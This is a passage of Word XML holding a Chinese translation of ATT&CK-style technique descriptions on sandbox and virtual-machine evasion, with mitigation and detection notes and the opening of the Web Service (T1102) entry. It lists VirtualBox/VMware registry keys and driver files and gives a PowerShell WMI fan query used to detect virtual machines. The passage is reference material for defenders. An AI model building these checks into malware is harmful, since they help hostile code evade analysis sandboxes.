      <w:r w:rsidRPr="00DA145D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>临时沙盒</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AD9202" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000B3041" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="000B3041">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机环境组件发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C73237" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B84D1B" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA145D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA145D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理规范</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA145D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA145D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Systeminfo</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA145D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表查询</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等实用程序来获取系统信息和搜索</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> VME </w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目。攻击者可能会在内存、进程、文件系统和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或注册表中搜索</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> VME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。攻击者可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA145D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将这些检查合并到一个脚本中，然后如果程序确定系统为虚拟环境，则退出程序。此外，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> VMWare </w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等应用程序中，对手可以使用特殊的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口发送命令和接收输出。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以检查驱动器大小。例如，可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Win32 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设备</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IO </w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制功能来完成此操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDE3981" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> VME </w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工件示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0450D552" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C145AE5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\HARDWARE\Description\System\"SystemBiosVersion";"VMWARE"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EFCE32" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\HARDWARE\ACPI\DSDT\BOX_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C6272F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统上的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VME</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DA19CD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>WINDOWS\system32\drivers\vmmouse.sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1CC49B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>WINDOWS\system32\vboxhook.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF672B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>Windows\system32\vboxdisp.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D15B604" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="af4"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="4F7CAC"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D32EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见检查可以枚举运行这些应用程序独有的服务、系统上安装的程序、与虚拟机应用程序相关的字符串的制造商</w:t>
      </w:r>
      <w:r w:rsidRPr="006D32EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="006D32EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产品字段以及特定于</w:t>
      </w:r>
      <w:r w:rsidRPr="006D32EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> VME </w:t>
      </w:r>
      <w:r w:rsidRPr="006D32EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的硬件</w:t>
      </w:r>
      <w:r w:rsidRPr="006D32EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="006D32EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理器说明。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F45F51" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF9722D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="006D32EC" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="006D32EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户行为发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659E1AB0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D32EC">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者可能会在主机上搜索用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>行为</w:t>
      </w:r>
      <w:r w:rsidRPr="006D32EC">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>（例如，浏览器历史记录、缓存、书签、主目录中的文件数等），以确保</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="006D32EC">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>真实环境。他们可以通过用户交互和数字签名来检测此类信息。他们可能会有恶意软件检查鼠标单击的速度和频率，以确定它是否是沙盒环境。在激活恶意代码之前，其他方法可能依赖于与系统的特定用户交互。示例包括等待文档关闭，然后再激活宏，以及等待用户双击嵌入的图像以激活。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D72B2F7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="006D32EC" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3448B68D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="006D32EC" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="006D32EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟硬件指纹发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64900CC6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者可能通过会检查机箱风扇和系统温度来收集表明是否是虚拟环境的证据。攻击者可能会利用一条</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>$q = "Select * from Win32_Fan" Get-WmiObject -Query $q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>进行一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>检查。如果这条</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>查询语句返回结果元素大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，这可能会告知他们此机器是一个物理机器。</w:t>
      </w:r>
      <w:hyperlink r:id="rId120" w:tgtFrame="_blank" w:history="1"/>
    </w:p>
    <w:p w14:paraId="0546E1B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4D345F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005021CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于系统功能的滥用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDED7A9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F043C3F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005021CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟化、沙盒和相关发现技术</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA145D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能发生</w:t>
      </w:r>
      <w:r w:rsidRPr="005021CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在操作的第一步中，但也可能在整个过程中发生，因为攻击者正在学习环境。数据和事件不应孤立地看待，而应作为行为链的一部分，根据获得的信息，可能导致其他活动，如横向移动。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依赖于攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="005021CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所需的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidRPr="005021CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和监视，检测与虚拟化和沙盒标识相关的操作可能很困难。监视正在生成的可疑进程，这些进程收集各种系统信息或执行其他形式的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA145D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r w:rsidRPr="005021CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，尤其是在短时间内，可能有助于检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00880C2A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="4D35CBD3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E476179" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1102</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13736455" w14:textId="752E1F92" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CDCDC2E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FF7BF9B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E7E708D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机网络接口，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，网络协议分析，网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>抓包，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SSL/TLS检查</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03B0C9DC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>需要网络：是</w:t>
            </w:r>
          </w:p>
